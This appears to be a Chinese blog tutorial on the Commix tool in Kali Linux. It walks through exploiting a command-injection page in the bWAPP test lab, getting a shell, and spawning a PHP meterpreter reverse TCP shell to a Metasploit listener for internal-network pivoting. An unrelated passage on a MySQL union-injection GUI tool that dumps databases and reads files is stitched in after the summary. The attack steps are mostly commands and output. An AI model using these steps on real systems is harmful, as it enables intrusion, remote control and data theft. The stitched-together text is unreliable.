php注入教程kali,Kali Linux渗透工具系统命令注入漏洞工具 – Commix使用

本文介绍了Kali中的自动化测试工具Commix,用于检测命令注入漏洞并实现反弹shell。通过步骤说明如何利用 Commix 导入历史记录,获取Cookie数据,执行渗透测试,最后演示了结合Metasploit进行内网渗透的过程。

声明:【Kali与编程】所有分享,仅做学习交流,切勿用于任何不法用途,否则后果自负!

v10bu11pm2A2VvN0560M9b.jpg

一、Commix是什么?

Commix由Python编写的一款工具,它是一个适用于web开发者、渗透测试人员及安全研究者的自动化测试工具,可以帮助他们更高效的发现web应用中的命令注入攻击相关漏洞。在Kali Linux中自带有Commix这款工具。

二、Commix补充介绍。

Commix是为了方便的检测一个请求是否存在命令注入漏洞,并且对其进行测试,现在的最新版本中支持直接直接导入burp的历史记录进行检测,大大提高了软件的易用性和渗透的成功率,不得不说,它是IT人员的渗透利器!

三、Commix使用参数有哪些?

在Kali Linux中输入commix –h获取帮助信息!

Hp3XT1zp017BL6WB71wW77.jpg

四、Commix如何使用?

其中的特定信息如Cookie,可通过浏览器调试工具或第三方工具获取!

~# commix --url "http://127.0.0.1/bWAPP/commandi.php" --cookie="acopendivids=swingset,jotto,phpbb2,redmine; acgroupswithpersist=nada; PHPSESSID=mq78064h3p2b00n4toerk7ana1; security_level=0" --data="target=www.nsa.gov&form=submit"

询问是否想要一个shell 输入Y 的到shell

[?] Do you want a Pseudo-Terminal shell? [Y/n] > y

Pseudo-Terminal (type '?' for available options)

commix(os_shell) >

得到shell

commix(os_shell) > pwd

/owaspbwa/bwapp-git/bWAPP

commix(os_shell) > id

uid=33(www-data) gid=33(www-data) groups=33(www-data)

commix(os_shell) > ls -ll

可以进行反弹shell 结合metasploit 进行内网渗透

commix(os_shell) > reverse_tcp

commix(reverse_tcp) > set LHOST 192.168.120.101 """(msf机器)

LHOST => 192.168.120.101

commix(reverse_tcp) > set LPORT 4444

LPORT => 4444

---[ Reverse TCP shells ]---

Type '1' to use a netcat reverse TCP shell.

Type '2' for other reverse TCP shells.

commix(reverse_tcp) > 2

---[ Unix-like reverse TCP shells ]---

Type '1' to use a PHP reverse TCP shell.

Type '2' to use a Perl reverse TCP shell.

Type '3' to use a Ruby reverse TCP shell.

Type '4' to use a Python reverse TCP shell.

Type '5' to use a Socat reverse TCP shell.

Type '6' to use a Bash reverse TCP shell.

Type '7' to use a Ncat reverse TCP shell.

---[ Meterpreter reverse TCP shells ]---

Type '8' to use a PHP meterpreter reverse TCP shell.

Type '9' to use a Python meterpreter reverse TCP shell.

Type '10' to use a Windows meterpreter reverse TCP shell.

Type '11' to use the web delivery script.

commix(reverse_tcp_other) > 8

[*] Generating the 'php/meterpreter/reverse_tcp' payload... [ SUCCEED ]

[*] Type "msfconsole -r /usr/share/commix/php_meterpreter.rc" (in a new window). #复制 启动msf

[*] Once the loading is done, press here any key to continue... #按下确定键就可进行在msf接收到反弹的shell

[+] Everything is in place, cross your fingers and wait for a shell!

ks1sMNR1QPWHuK1MiD1I71.jpg

Commix使用总结如下:

1.浏览器访问http://127.0.0.1 /bWAPP/commandi.php

2.提交数据 通过抓包工具截取 url cookie data数据

3.用commix 工具指定链接并进入后台

commix -- url "http://127.0.0.1 /bWAPP/commandi.php" --data="target=www.nsa.gov&form=submit" --cookie "+++++++"

亲爱的同学,我们将持续分享Kali与编程技巧,欢迎关注我们哦!

点击了解更多,还有更多Kali与编程技巧,等你来学!

打开软件,界面如图1,界面很清晰和整洁。 使用的时候,Mysql5 inj point那个框就是你要注射的url。该url应该是有注射漏洞的点。要连union一起,就像默认值那样 http://127.0.0.1/x.php?id=10 and 1=2 union select 1,2,3,4,5 比如第4个数字会在页面上显示,那么你就将数字4替换成“loveuk”,而且最后不要跟注释符(因为程序会在提交的时候默认会自动加上),最终的url如下: http://127.0.0.1/x.php?id=10 and 1=2 union select 1,2,loveuk,4,5 设置好这个点,可以选择注射类型,这里以GET类型为例子做示范。HexEnCode一般不要选上,除非出现编码不匹配的时候才需要,空格默认是用/**/替换的,可以根据具体情况修改。 设置好后点GO,就可以开始注射了,很快数据库里面的所有库就都被列了出来,如图二。下一步操作,选中你要猜解的数据库库名,右击,选择list tables即可。猜解完表名,可以选在你需要的表来猜字段,方法和选择数据库名时一样,右击选择list Fields,如图三、图四。最后一步是读取数据,将你感兴趣的那个字段其面打上钩即可,右击选择read dates就可以得到你想要的数据了!如图五。整个过程中你不必等到每一步都进行完了再进行下一步,如果你感性趣的内容已经出来了,只要单击STOP按钮程序即可停止。 另外,软件还集成了利用注射读文件的功能,如图六,选择readfile,然后在弹出的对话框中数据你要读的文件的绝对路径即可,不过要求有文件权限才可以。 附: 较前一个版本该,版本增加了进度条显示,方便用户使用本软件时,可以清除明了的知道当前数据读取进度;另一个新功能是增加了表的记录数显示功能,可以快捷的查看对应数据库中各各表的记录总数,以便用户操作。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符  | 博主筛选后可见
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值